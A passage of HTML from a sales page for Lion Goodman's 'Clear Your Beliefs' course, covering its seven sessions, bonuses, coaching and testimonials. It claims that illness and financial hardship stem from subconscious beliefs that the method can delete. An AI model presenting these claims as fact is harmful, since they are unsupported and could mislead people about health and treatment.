opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our 